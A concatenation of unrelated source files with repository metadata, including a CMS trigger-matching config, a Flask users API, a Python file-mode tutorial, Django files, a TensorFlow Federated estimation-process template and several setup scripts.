c67fe6238023902f41611968a1a80044d9f015c6 | 2455062787d67535da8be051ac5e361a097cf66f | /Producers/BSUB/TrigProd_amumu_a5_dR5/trigger_amumu_producer_cfg_TrigProd_amumu_a5_dR5_146.py | e91f8bd9936a35e7eda09f0a5bf5d8e8621bf2c6 | [] | no_license | kmtos/BBA-RecoLevel | 6e153c08d5ef579a42800f6c11995ee55eb54846 | 367adaa745fbdb43e875e5ce837c613d288738ab | refs/heads/master | 2021-01-10T08:33:45.509687 | 2015-12-04T09:20:14 | 2015-12-04T09:20:14 | 43,355,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,360 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("PAT")
#process.load("BBA/Analyzer/bbaanalyzer_cfi")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load('Configuration.EventContent.EventContent_cff')
process.load("Configuration.Geometry.GeometryRecoDB_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")
process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'MCRUN2_71_V1::All', '')
process.load("Configuration.StandardSequences.MagneticField_cff")
####################
# Message Logger
####################
process.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(100)
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
## switch to uncheduled mode
process.options.allowUnscheduled = cms.untracked.bool(True)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(500)
)
####################
# Input File List
####################
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('root://eoscms//eos/cms/store/user/ktos/RECO_Step3_amumu_a5/RECO_Step3_amumu_a5_146.root'),
secondaryFileNames = cms.untracked.vstring()
)
############################################################
# Defining matching in DeltaR, sorting by best DeltaR
############################################################
process.mOniaTrigMatch = cms.EDProducer("PATTriggerMatcherDRLessByR",
src = cms.InputTag( 'slimmedMuons' ),
matched = cms.InputTag( 'patTrigger' ), # selections of trigger objects
matchedCuts = cms.string( 'type( "TriggerMuon" ) && path( "HLT_Mu16_TkMu0_dEta18_Onia*")' ), # input does not yet have the 'saveTags' parameter in HLT
maxDPtRel = cms.double( 0.5 ), # no effect here
maxDeltaR = cms.double( 0.3 ), #### selection of matches
maxDeltaEta = cms.double( 0.2 ), # no effect here
resolveAmbiguities = cms.bool( True ),# definition of matcher output
resolveByMatchQuality = cms.bool( True )# definition of matcher output
)
# talk to output module
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("file:RECO_Step3_amumu_a5_TrigProd_146.root"),
outputCommands = process.MINIAODSIMEventContent.outputCommands
)
process.out.outputCommands += [ 'drop *_*_*_*',
'keep *_*slimmed*_*_*',
'keep *_pfTausEI_*_*',
'keep *_hpsPFTauProducer_*_*',
'keep *_hltTriggerSummaryAOD_*_*',
'keep *_TriggerResults_*_HLT',
'keep *_patTrigger*_*_*',
'keep *_prunedGenParticles_*_*',
'keep *_mOniaTrigMatch_*_*'
]
################################################################################
# Running the matching and setting the the trigger on
################################################################################
from PhysicsTools.PatAlgos.tools.trigTools import *
switchOnTrigger( process ) # This is optional and can be omitted.
switchOnTriggerMatching( process, triggerMatchers = [ 'mOniaTrigMatch'
])
process.outpath = cms.EndPath(process.out)
| [
"kmtos@ucdavis.edu"
] | kmtos@ucdavis.edu |
8125e50786127c92c990c4260f700f56dd0cc45f | c274181853c53c3be24590bfb85605fa2da8c896 | /services/users/project/api/users.py | 5b9aaface633ab67bc9071f8c18118b864e8effb | [] | no_license | zxy-zxy/testdriven-app | 915861db6bb4e5cff975b45931299c81e392b699 | 5b15133032ccac9d97b52695b460418497511d14 | refs/heads/master | 2020-04-16T07:24:29.045575 | 2019-02-12T17:07:49 | 2019-02-12T17:07:49 | 148,199,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | from flask import (
Blueprint,
jsonify,
request,
render_template,
)
from sqlalchemy import exc
from project.api.models import User
from project import db
from project.api.utils import authenticate, admin_required
users_blueprint = Blueprint('users', __name__, template_folder='./templates')
@users_blueprint.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
username = request.form['username']
email = request.form['email']
password = request.form['password']
db.session.add(User(
username=username,
email=email,
password=password, ))
db.session.commit()
users = User.query.all()
return render_template('index.html', users=users)
@users_blueprint.route('/users/ping', methods=['GET'])
def ping_pong():
return jsonify({
'status': 'success',
'message': 'pong!'
})
@users_blueprint.route('/users', methods=['POST'])
@authenticate
@admin_required
def add_user(resp):
post_data = request.get_json()
response_object = {
'status': 'fail',
'message': 'Invalid payload.'
}
if not post_data:
return jsonify(response_object), 400
username = post_data.get('username')
email = post_data.get('email')
password = post_data.get('password')
try:
user = User.query.filter_by(email=email).first()
if user:
response_object['message'] = 'Sorry. That email already exists.'
return jsonify(response_object), 400
db.session.add(User(
username=username,
email=email,
password=password, )
)
db.session.commit()
response_object['status'] = 'success'
response_object['message'] = f'{email} was added!'
return jsonify(response_object), 201
except (exc.IntegrityError, ValueError):
db.session.rollback()
return jsonify(response_object), 400
@users_blueprint.route('/users/<user_id>', methods=['GET'])
def get_single_user(user_id):
response_object = {
'status': 'fail',
'message': 'User does not exist.'
}
try:
user = User.query.filter_by(id=int(user_id)).first()
if not user:
return jsonify(response_object), 404
response_object = {
'status': 'success',
'data': {
'id': user.id,
'username': user.username,
'email': user.email,
'active': user.active
}
}
return jsonify(response_object), 200
except ValueError:
return jsonify(response_object), 404
@users_blueprint.route('/users', methods=['GET'])
def get_all_users():
response_object = {
'status': 'success',
'data': {
'users': [user.to_json() for user in User.query.all()]
}
}
return jsonify(response_object), 200
| [
"sinitsinvanya@gmail.com"
] | sinitsinvanya@gmail.com |
4bc9f1a96de3486487f1c8d329a89abd9556f599 | d8461c32954a63f9f873ecd773d05f2827c8d19b | /kaikeba/AIPython基础/2.文件操作-文件打开的模式详解.py | 4551b46ad0bb28e1a03fc1d463121faed6e88a4e | [] | no_license | xidaodi/AILearn | a5426af12e8e7904fdf1c2074b31c7090f9b7bfd | a397d9dc055daf15d79e3e8e1d958126d6a4250d | refs/heads/master | 2023-03-26T21:20:47.718182 | 2021-03-31T09:14:05 | 2021-03-31T09:14:05 | 328,991,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,838 | py | # 。基础操作的方法
'''
1。打开文件 open()
参数1:文件路径
路径 url 统一资源定位符
相对路径: 就像给别人指路一样: 在某某大厦的对面。。。
针对文件的相对路径的表示,从当前目录开始计算
1.txt ==> 具体文件前没有任何表示时,默认为当前目录 和 ./1.txt 是一个位置
./1.txt ==> ./ 代表当前目录中的 1.txt
../1.txt ==> ../ 代表当前目录中的 上一级目录中的1.txt
绝对路径: 就像买东西写收货地址一样: 北京市海淀区中关村大街128号xxx小区,xxx号楼xx单元xx室
windows: c:/users/appdata/1.txt
Linux: /user/home/yc/1.txt
参数2:打开的方式
基础模式: w r x a
w w模式 write 写入模式
1。 文件如果不存在,则创建这个文件
2。 文件如果存在,则打开这个文件,并且清空文件内容
3。 文件打开后,文件的指针在文件的最前面
r r模式: read 读取模式
1。 如果文件不存在,则报错
2。 文件如果存在,则打开文件
3。 文件指针在文件的最前面
x x模式: xor 异或模式
1。文件不存在,则创建这个文件
2。文件已存在,则报错(防止覆盖)
3。文件的指针在文件的最前面
a a模式: append 追加模式
1。文件不存在,则创建文件
2。文件如果存在,则打开文件 (和w模式的区别在于。a模式打开文件后不会清空)
3。文件指针在当前文件的最后
扩展模式:
b b模式 bytes 二进制
+ +模式 plus 增强模式(可读可写)
文件操作模式的组合:
w,r,a,x
wb,rb,ab,xb,
w+,r+,a+,x+
wb+,rb+,ab+,xb+
参数 encoding 可选参数,设置文件的字符集,
如果是一个二进制的文件时,不需要设置字符集
encoding='utf-8'
'''
# 1。打开文件
# 打开文件,创建了一个文件对象
fp = open('./1.txt','x',encoding='utf-8')
# 如果使用r模式打开一个不存在的文件,则会引发错误
#FileNotFoundError: [Errno 2] No such file or directory: './2.txt'
# 如果使用x模型打开一个已经存在的文件,则会报错
# FileExistsError: [Errno 17] File exists: './1.txt'
# 2。 读取文件内容
# 使用文件对象 调用 read() 方法
res = fp.read()
print(res)
# 3。关闭文件
# 使用文件对象,调用close() 方法 关闭文件
fp.close()
| [
"35069982+xidaodi@users.noreply.github.com"
] | 35069982+xidaodi@users.noreply.github.com |
cf088118d90ff342c3993518783e8407e3511bf7 | 494aad64e72ed100a884c8fcc8c0907ba399c178 | /articles/migrations/0003_auto_20200717_1531.py | 6342e5b845a1bd59c5b789be2fdbdfb8ce2b62a9 | [] | no_license | maziokey/Newspaper-App | 877fc904bcfe94952b139b3fee7f89d1aa42f601 | d2ed1a650a9d297533d6da90e7d96d27e91ff0a0 | refs/heads/master | 2022-11-18T03:13:25.185632 | 2020-07-17T14:56:50 | 2020-07-17T14:56:50 | 280,452,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 3.0.8 on 2020-07-17 14:31
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('articles', '0002_comment'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='article',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='articles.Article'),
),
]
| [
"okeyluvsu2004@yahoo.com"
] | okeyluvsu2004@yahoo.com |
b15a2ac36edb6d4bc35cb3bfda2ab22bb4447a1b | 29e91d422f0fcad92f0e25b3dbb9efd39dc01162 | /electronic-station/one-line-drawing.py | 25bfea7dd9668580298643bce015ab26a2f3780c | [] | no_license | cielavenir/checkio | c206410b7d8d368e80ad0f66f6314097bd900bcd | e2dfcdef75cd68ca3cced159225b5433570bd85b | refs/heads/master | 2021-01-22T20:34:29.899146 | 2018-02-22T15:16:21 | 2018-02-22T15:16:21 | 85,328,995 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | from collections import defaultdict
def dfs(roads,cur,points,num):
for nxt in points[cur]:
num[nxt]+=2
cur_road=list(sorted([cur,nxt]))
r=None
if num[nxt]<=len(points[nxt]) and cur_road not in roads:
r=dfs(roads+[cur_road],nxt,points,num)
num[nxt]-=2
if r!=None: return [cur]+r
if all(len(points[e])==num[e] for e in points): return [cur]
def draw(segments):
points={}
for _p in segments:
p,q=((_p[0],_p[1]),(_p[2],_p[3]))
if p not in points: points[p]=[]
if q not in points: points[q]=[]
points[p].append(q)
points[q].append(p)
odd=[]
for p in points:
if len(points[p])%2==1: odd.append(p)
if 1==len(odd) or 2<len(odd): return []
cur,end=(odd[0],odd[1]) if odd else (q,q)
num=defaultdict(int)
num[cur]+=1
num[end]-=1
for nxt in points[cur]:
num[nxt]+=2
r=None
if num[nxt]<=len(points[nxt]):
r=dfs([list(sorted([cur,nxt]))],nxt,points,num)
num[nxt]-=2
if r!=None: return [cur]+r
if __name__ == '__main__':
def checker(func, in_data, is_possible=True):
user_result = func(in_data)
if not is_possible:
if user_result:
print("How did you draw this?")
return False
else:
return True
if len(user_result) < 2:
print("More points please.")
return False
data = list(in_data)
for i in range(len(user_result) - 1):
f, s = user_result[i], user_result[i + 1]
if (f + s) in data:
data.remove(f + s)
elif (s + f) in data:
data.remove(s + f)
else:
print("The wrong segment {}.".format(f + s))
return False
if data:
print("You forgot about {}.".format(data[0]))
return False
return True
assert checker(draw,
{(1, 2, 1, 5), (1, 2, 7, 2), (1, 5, 4, 7), (4, 7, 7, 5)}), "Example 1"
assert checker(draw,
{(1, 2, 1, 5), (1, 2, 7, 2), (1, 5, 4, 7),
(4, 7, 7, 5), (7, 5, 7, 2), (1, 5, 7, 2), (7, 5, 1, 2)},
False), "Example 2"
assert checker(draw,
{(1, 2, 1, 5), (1, 2, 7, 2), (1, 5, 4, 7), (4, 7, 7, 5),
(7, 5, 7, 2), (1, 5, 7, 2), (7, 5, 1, 2), (1, 5, 7, 5)}), "Example 3" | [
"cielartisan@gmail.com"
] | cielartisan@gmail.com |
0ecb7644f9cfbe85cb7f88894fc8700507809cf4 | d3384a81207c1b6cfd0ff304694fec93727a6771 | /dogapp/urls.py | a94e9012c49417f9f7fa3f525881ae1262045f51 | [] | no_license | jucie15/dogapp | 5b36b4032b7af35ef86da49005602a51bceb5eb6 | 1f8be7c704c36d98474fedd327490a3220a704c0 | refs/heads/master | 2021-01-02T22:52:15.729043 | 2017-08-05T22:30:43 | 2017-08-05T22:30:43 | 99,407,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | """dogapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^matching/', include('matching.urls', namespace='matching')),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"jucie15@nate.com"
] | jucie15@nate.com |
d01c453bb0a1eb84cc26061f47cf2668a51900bd | f546b54b3d5120b7cc5bce9a3ec07b4c380548e9 | /calm/dsl/decompile/file_handler.py | e5fee6019f30547d01b63eae04905d36e9f4a14f | [
"Apache-2.0"
] | permissive | gabybeitler/calm-dsl | 000c1861fbaa061243e78f24bc25d6fdbca9a5d0 | bac453413cfcf800eef95d89d5a7323c83654a93 | refs/heads/master | 2021-07-14T09:00:47.938284 | 2021-03-02T14:43:13 | 2021-03-02T14:43:13 | 238,353,395 | 1 | 0 | null | 2020-02-05T02:42:06 | 2020-02-05T02:42:05 | null | UTF-8 | Python | false | false | 1,373 | py | import os
LOCAL_DIR = None
SCRIPTS_DIR = None
SPECS_DIR = None
BP_DIR = None
LOCAL_DIR_KEY = ".local"
SCRIPTS_DIR_KEY = "scripts"
SPECS_DIR_KEY = "specs"
def make_bp_dirs(bp_dir):
if not os.path.isdir(bp_dir):
os.makedirs(bp_dir)
local_dir = os.path.join(bp_dir, LOCAL_DIR_KEY)
if not os.path.isdir(local_dir):
os.makedirs(local_dir)
spec_dir = os.path.join(bp_dir, SPECS_DIR_KEY)
if not os.path.isdir(spec_dir):
os.makedirs(spec_dir)
scripts_dir = os.path.join(bp_dir, SCRIPTS_DIR_KEY)
if not os.path.isdir(scripts_dir):
os.makedirs(scripts_dir)
return (bp_dir, local_dir, spec_dir, scripts_dir)
def init_bp_dir(bp_dir):
global LOCAL_DIR, SCRIPTS_DIR, SPECS_DIR, BP_DIR
BP_DIR, LOCAL_DIR, SPECS_DIR, SCRIPTS_DIR = make_bp_dirs(bp_dir)
return (BP_DIR, LOCAL_DIR, SPECS_DIR, SCRIPTS_DIR)
def get_bp_dir():
return BP_DIR
def get_local_dir():
return LOCAL_DIR
def get_specs_dir():
return SPECS_DIR
def get_scripts_dir():
return SCRIPTS_DIR
def get_local_dir_key():
return LOCAL_DIR_KEY
def get_specs_dir_key():
return SPECS_DIR_KEY
def get_scripts_dir_key():
return SCRIPTS_DIR_KEY
def init_file_globals():
global LOCAL_DIR, SPECS_DIR, SCRIPTS_DIR, BP_DIR
LOCAL_DIR = None
SCRIPTS_DIR = None
SPECS_DIR = None
BP_DIR = None
| [
"abhijeet.kaurav@nutanix.com"
] | abhijeet.kaurav@nutanix.com |
199a1a6fc8c42b985e005e6a0104dca9e08dbc43 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/421/usersdata/314/87426/submittedfiles/tomadas.py | 182732d078103dd723da0646a6f90c8d7964ae31 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | # -*- coding: utf-8 -*-
import math
#COMECE SEU CODIGO AQUI
t1=int(input('digite t1: '))
t2=int(input('digite t2: '))
t3=int(input('digite t3: '))
t4=int(input('digite t4: '))
for i in range(0,5,1):
while(t1<1 or t2<1 or t3<1 or t4<1):
t1=int(input('digite t1: '))
t2=int(input('digite t2: '))
t3=int(input('digite t3: '))
t4=int(input('digite t4: '))
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
c5e990b0199da83f612a0fa4ac1be8b4bb1546e9 | b0cc185ca50618c64caf97821eda6f264a917a75 | /setup.py | 01cbe2eb3d6531de5dfbc6a7cb6c3e06f9349618 | [] | no_license | AztecSmith/PyEngineIO-Client | fa77ae11a17613b6d27f1de132baa591c7e4a808 | e2c6fcfc6bba4b8c36090ec4629300856aa5d929 | refs/heads/master | 2021-05-27T16:12:04.923656 | 2014-09-30T23:38:51 | 2014-09-30T23:38:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 681 | py | from setuptools import setup, find_packages
setup(
name='PyEngineIO-Client',
version='1.2.1.1-beta',
url='http://github.com/fuzeman/PyEngineIO-Client/',
author='Dean Gardiner',
author_email='me@dgardiner.net',
description='Client for engine.io',
packages=find_packages(),
platforms='any',
install_requires=[
'PyEmitter',
'PyEngineIO-Parser',
'requests',
'requests-futures',
'websocket-client'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python'
],
)
| [
"gardiner91@gmail.com"
] | gardiner91@gmail.com |
c70332e8ef33875d1f0ec48efb4f286ba2021f3a | 4cdc90a76a5766cff1bcb297bd7ffc038f5c537a | /backend/api/user_auth/serializers.py | b10592f0591018930a0d0dec78e2ca21cbed9fcb | [] | no_license | gnsaddy/djangocicd | 62fca94d4fbb52ac1ffef21cbde6195aa7e9101e | 8b49c2777ff4e2c8cf1b27f76ae1d1efdb924d8b | refs/heads/main | 2023-06-23T21:32:07.681197 | 2021-07-16T15:48:44 | 2021-07-16T15:48:44 | 386,282,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,161 | py | from django.contrib import auth
from django.contrib.auth.models import update_last_login
from rest_framework.response import Response
from rest_framework_simplejwt.exceptions import TokenError, AuthenticationFailed
from rest_framework_simplejwt.serializers import TokenObtainPairSerializer
from rest_framework_simplejwt.settings import api_settings
from rest_framework_simplejwt.tokens import RefreshToken
from .models import CustomUser, StudentModel, FacultyModel
from rest_framework import serializers, status
from django.contrib.auth import password_validation
from rest_framework.decorators import authentication_classes, permission_classes
class StudentSerializers(serializers.HyperlinkedModelSerializer):
def create(self, validated_data):
password = validated_data.pop('password', None)
instance = self.Meta.model(**validated_data)
if password is not None:
instance.set_password(password)
instance.save()
return instance
def update(self, instance, validated_data):
for attr, value in validated_data.items():
if attr == 'password':
instance.set_password(value)
else:
setattr(instance, attr, value)
instance.save()
return instance
class Meta:
model = StudentModel
extra_kwargs = {
'password': {
'write_only': True
}
}
fields = ('id', 'sid', 'first_name', 'last_name', 'email', 'password', 'student_phone',
'picture', 'gender', 'student_grade', 'student_school', 'student_college', 'student_city',
'student_state', 'student_country', 'student_parent_name', 'student_parent_email',
'student_parent_phone', 'created_at', 'student_date_joined', 'student'
)
class MyTokenObtainPairSerializer(TokenObtainPairSerializer):
def create(self, validated_data):
pass
def update(self, instance, validated_data):
pass
@classmethod
def get_token(cls, user):
token = super().get_token(user)
# Add custom claims
token['email'] = user.email
return token
def validate(self, attrs):
data = super().validate(attrs)
data['email'] = self.user.email
data['first_name'] = self.user.first_name
data['last_name'] = self.user.last_name
if api_settings.UPDATE_LAST_LOGIN:
update_last_login(None, self.user)
return data
class LogoutSerializer(serializers.Serializer):
def update(self, instance, validated_data):
pass
def create(self, validated_data):
pass
refresh = serializers.CharField()
default_error_message = {
'bad_token': 'Token is expired or invalid'
}
def validate(self, attrs):
self.token = attrs['refresh']
return attrs
def save(self, **kwargs):
try:
RefreshToken(self.token).blacklist()
except TokenError:
self.fail('bad_token')
| [
"aditya.x510@gmail.com"
] | aditya.x510@gmail.com |
3582fa376bc661315a7806f49fbd0525d5029316 | 53e58c213232e02250e64f48b97403ca86cd02f9 | /16/mc/ExoDiBosonResonances/EDBRTreeMaker/test/crab3_analysisM2500_R_0-4.py | 656892fc959de47eea0dd5f18dd926abc1651b8e | [] | no_license | xdlyu/fullRunII_ntuple_102X | 32e79c3bbc704cfaa00c67ab5124d40627fdacaf | d420b83eb9626a8ff1c79af5d34779cb805d57d8 | refs/heads/master | 2020-12-23T15:39:35.938678 | 2020-05-01T14:41:38 | 2020-05-01T14:41:38 | 237,192,426 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,303 | py | from WMCore.Configuration import Configuration
name = 'WWW/sig'
steam_dir = 'xulyu'
config = Configuration()
config.section_("General")
config.General.requestName = 'M2500_R0-4_off'
config.General.transferLogs = True
config.section_("JobType")
config.JobType.pluginName = 'Analysis'
config.JobType.inputFiles = ['Summer16_07Aug2017_V11_MC_L1FastJet_AK4PFchs.txt','Summer16_07Aug2017_V11_MC_L2Relative_AK4PFchs.txt','Summer16_07Aug2017_V11_MC_L3Absolute_AK4PFchs.txt','Summer16_07Aug2017_V11_MC_L1FastJet_AK8PFchs.txt','Summer16_07Aug2017_V11_MC_L2Relative_AK8PFchs.txt','Summer16_07Aug2017_V11_MC_L3Absolute_AK8PFchs.txt','Summer16_07Aug2017_V11_MC_L1FastJet_AK8PFPuppi.txt','Summer16_07Aug2017_V11_MC_L2Relative_AK8PFPuppi.txt','Summer16_07Aug2017_V11_MC_L3Absolute_AK8PFPuppi.txt','Summer16_07Aug2017_V11_MC_L1FastJet_AK4PFPuppi.txt','Summer16_07Aug2017_V11_MC_L2Relative_AK4PFPuppi.txt','Summer16_07Aug2017_V11_MC_L3Absolute_AK4PFPuppi.txt']
#config.JobType.inputFiles = ['PHYS14_25_V2_All_L1FastJet_AK4PFchs.txt','PHYS14_25_V2_All_L2Relative_AK4PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK4PFchs.txt','PHYS14_25_V2_All_L1FastJet_AK8PFchs.txt','PHYS14_25_V2_All_L2Relative_AK8PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK8PFchs.txt']
# Name of the CMSSW configuration file
#config.JobType.psetName = 'bkg_ana.py'
config.JobType.psetName = 'analysis_sig.py'
#config.JobType.allowUndistributedCMSSW = True
config.JobType.allowUndistributedCMSSW = True
config.section_("Data")
#config.Data.inputDataset = '/WJetsToLNu_13TeV-madgraph-pythia8-tauola/Phys14DR-PU20bx25_PHYS14_25_V1-v1/MINIAODSIM'
config.Data.inputDataset = '/WkkToWRadionToWWW_M2500-R0-4-TuneCUETP8M1_13TeV-madgraph-pythia/RunIISummer16MiniAODv3-PUMoriond17_94X_mcRun2_asymptotic_v3-v1/MINIAODSIM'
#config.Data.inputDBS = 'global'
config.Data.inputDBS = 'global'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob =5
config.Data.totalUnits = -1
config.Data.publication = False
config.Data.outLFNDirBase = '/store/group/dpg_trigger/comm_trigger/TriggerStudiesGroup/STEAM/' + steam_dir + '/' + name + '/'
# This string is used to construct the output dataset name
config.Data.outputDatasetTag = 'M2500_R0-4_off'
config.section_("Site")
# Where the output files will be transmitted to
config.Site.storageSite = 'T2_CH_CERN'
| [
"XXX@cern.ch"
] | XXX@cern.ch |
c9dfde608b02ae4645c4a7b55b829cd7113669f6 | a8278268c366567e92e7e42cbd00ac6dc1c7ca8a | /tensorflow_federated/python/core/templates/estimation_process.py | 81051fb96fc071ee2344f7cd4c896382092cdaa5 | [
"Apache-2.0"
] | permissive | tianya3796/federated | 4e743b98912f9890a9d70af6817f3671e5cdd4b9 | 2abc58ad767f119f3f498900f3fffa68e5198c60 | refs/heads/master | 2022-12-27T19:18:11.798188 | 2020-10-09T00:36:41 | 2020-10-09T00:37:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,304 | py | # Copyright 2020, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a template for a process that maintains an estimate."""
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.core.api import computation_base
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.templates import errors
from tensorflow_federated.python.core.templates import iterative_process
class EstimationProcess(iterative_process.IterativeProcess):
"""A `tff.templates.IterativeProcess that maintains an estimate.
In addition to the `initialize` and `next` functions provided by an
`IterativeProcess`, an `EstimationProcess` has a `get_estimate` function that
returns the result of some computation on the process state. The argument
of `get_estimate` must be of the same type as the state, that is, the type
of object returned by `initialize`.
"""
def __init__(self, initialize_fn: computation_base.Computation,
next_fn: computation_base.Computation,
get_estimate_fn: computation_base.Computation):
super().__init__(initialize_fn, next_fn)
py_typecheck.check_type(get_estimate_fn, computation_base.Computation)
estimate_fn_arg_type = get_estimate_fn.type_signature.parameter
if not estimate_fn_arg_type.is_assignable_from(self.state_type):
raise errors.TemplateStateNotAssignableError(
f'The state type of the process must be assignable to the '
f'input argument of `get_estimate_fn`, but the state type is: '
f'{self.state_type}\n'
f'and the argument of `get_estimate_fn` is:\n'
f'{estimate_fn_arg_type}')
self._get_estimate_fn = get_estimate_fn
@property
def get_estimate(self) -> computation_base.Computation:
"""A `tff.Computation` that computes the current estimate from `state`.
Given a `state` controlled by this process, computes and returns the most
recent estimate of the estimated quantity.
Note that this computation operates on types without placements, and thus
can be used with `state` residing either on `SERVER` or `CLIENTS`.
Returns:
A `tff.Computation`.
"""
return self._get_estimate_fn
def apply(transform_fn: computation_base.Computation,
arg_process: EstimationProcess):
"""Builds an `EstimationProcess` by applying `transform_fn` to `arg_process`.
Args:
transform_fn: A `computation_base.Computation` to apply to the estimate of
the arg_process.
arg_process: An `EstimationProcess` to which the transformation will be
applied.
Returns:
An estimation process that applies `transform_fn` to the result of calling
`arg_process.get_estimate`.
"""
py_typecheck.check_type(transform_fn, computation_base.Computation)
py_typecheck.check_type(arg_process, EstimationProcess)
arg_process_estimate_type = arg_process.get_estimate.type_signature.result
transform_fn_arg_type = transform_fn.type_signature.parameter
if not transform_fn_arg_type.is_assignable_from(arg_process_estimate_type):
raise errors.TemplateStateNotAssignableError(
f'The return type of `get_estimate` of `arg_process` must be '
f'assignable to the input argument of `transform_fn`, but '
f'`get_estimate` returns type:\n{arg_process_estimate_type}\n'
f'and the argument of `transform_fn` is:\n'
f'{transform_fn_arg_type}')
transformed_estimate_fn = computations.tf_computation(
lambda state: transform_fn(arg_process.get_estimate(state)),
arg_process.state_type)
return EstimationProcess(
initialize_fn=arg_process.initialize,
next_fn=arg_process.next,
get_estimate_fn=transformed_estimate_fn)
| [
"tensorflow.copybara@gmail.com"
] | tensorflow.copybara@gmail.com |
8bdb6e215d3fe86a475a3531cf47a6603d0345ca | a5b4d77e760c6131ba1c5f040265a3b08d3c0478 | /enemy_bot/enemy_bot_level8/burger_war/scripts/service_client.py | 0e7341b568e443d724b5aee09e1b16dfaceca475 | [
"BSD-3-Clause"
] | permissive | kenjirotorii/burger_war_kit | 700b511739299a9d90d23c70262ecf4856d234b7 | d9b1b443f220980a4118c13cdf22174696c3db9c | refs/heads/main | 2023-03-21T23:32:24.415502 | 2021-03-11T15:59:12 | 2021-03-11T15:59:12 | 337,704,943 | 0 | 1 | BSD-3-Clause | 2021-03-11T15:59:13 | 2021-02-10T11:36:22 | Python | UTF-8 | Python | false | false | 301 | py | import rospy
from std_srvs.srv import Empty
import time
if __name__ == "__main__":
rospy.wait_for_service("service_call")
service_call = rospy.ServiceProxy("service_call",Empty)
while True:
# 1秒に1回サービスで通信
service_call()
time.sleep(1)
| [
"you@example.com"
] | you@example.com |
07d846906c2039c3f58ea3d83909a09000239748 | b76615ff745c6d66803506251c3d4109faf50802 | /pyobjc-framework-DeviceCheck/setup.py | 3f9d906f3f61730f361afa0e45f1397c1622cbf2 | [
"MIT"
] | permissive | danchr/pyobjc-git | 6ef17e472f54251e283a0801ce29e9eff9c20ac0 | 62b787fddeb381184043c7ff136f1c480755ab69 | refs/heads/master | 2021-01-04T12:24:31.581750 | 2020-02-02T20:43:02 | 2020-02-02T20:43:02 | 240,537,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | """
Wrappers for the "DeviceCheck" framework on macOS 10.15 and later.
These wrappers don't include documentation, please check Apple's documention
for information on how to use this framework and PyObjC's documentation
for general tips and tricks regarding the translation between Python
and (Objective-)C frameworks
"""
from pyobjc_setup import setup
import os
VERSION = "6.2b1"
setup(
name="pyobjc-framework-DeviceCheck",
description="Wrappers for the framework DeviceCheck on macOS",
min_os_level="10.15",
packages=["DeviceCheck"],
version=VERSION,
install_requires=["pyobjc-core>=" + VERSION, "pyobjc-framework-Cocoa>=" + VERSION],
long_description=__doc__,
)
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
